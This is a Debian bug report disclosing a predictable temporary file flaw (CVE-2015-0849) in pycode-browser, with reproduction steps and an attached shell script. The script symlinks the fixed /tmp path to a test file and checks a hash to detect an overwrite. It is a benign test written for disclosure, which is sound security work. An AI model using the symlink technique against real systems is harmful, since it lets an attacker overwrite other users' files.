Bug#790365: pycode-browser: predictable temporary file vulnerability

Sun, 28 Jun 2015 07:24:35 -0700 

Package: pycode-browser
Version: 20120614+git+b041dd2-8
Severity: normal
Tags: security

pycode-browser has a predictable temporary file vulnerability.

When following the below steps, it uses the predictable
temporary file /tmp/pycode-0007-0007.py and will overwrite its contents.
You can reproduce this with the attached script by running
"./test-pycode-browser pycode-browser" and following the steps.

* Launch pycode-browser (with or without the script).
* Open one of the test programs.
* Modify it in some way.
* Do not save the file.
* Click the Execute button.

The program will write the contents to the temporary file.  Upon
exiting, the script will report that the program is vulnerable.  The
vulnerability is ameliorated by fs.protected_symlinks, but systems
running without that enabled are vulnerable to a symlink attack.

The Debian Security Team has allocated CVE-2015-0849 to this
vulnerability.  I sent an email to upstream but have received no
response, so I'm filing this bug.  No DSA will be issued for this
vulnerability.

-- System Information:
Debian Release: stretch/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (500, 'stable'), (1, 'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 4.0.0-2-amd64 (SMP w/4 CPU cores)
Locale: LANG=es_US.UTF-8, LC_CTYPE=es_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

-- 
brian m. carlson / brian with sandals: Houston, Texas, US
+1 832 623 2791 | http://www.crustytoothpaste.net/~bmc | My opinion only
OpenPGP: RSA v4 4096b: 88AC E9B2 9196 305B A994 7552 F1BA 225C 0223 B187

#!/bin/sh
# test-pycode-browser: set up temporary file vuln testing
#
# Usage: test-pycode-browser pycode-browser

TEMPDIR=`mktemp -d`

[ -n "$TEMPDIR" ] || exit 1

printf '%d exploit test\n' $$ > "$TEMPDIR/exploit"
sha384sum "$TEMPDIR/exploit" > "$TEMPDIR/hash"

ln -s "$TEMPDIR/exploit" "/tmp/pycode-0007-0007.py"

"$@"

if sha384sum -c "$TEMPDIR/hash" >/dev/null 2>&1
then
        printf "Program is not vulnerable.\n"
else
        printf "Program is VULNERABLE!\n"
fi
rm -r -- "$TEMPDIR"

Attachment: signature.asc
Description: Digital signature

Reply via email to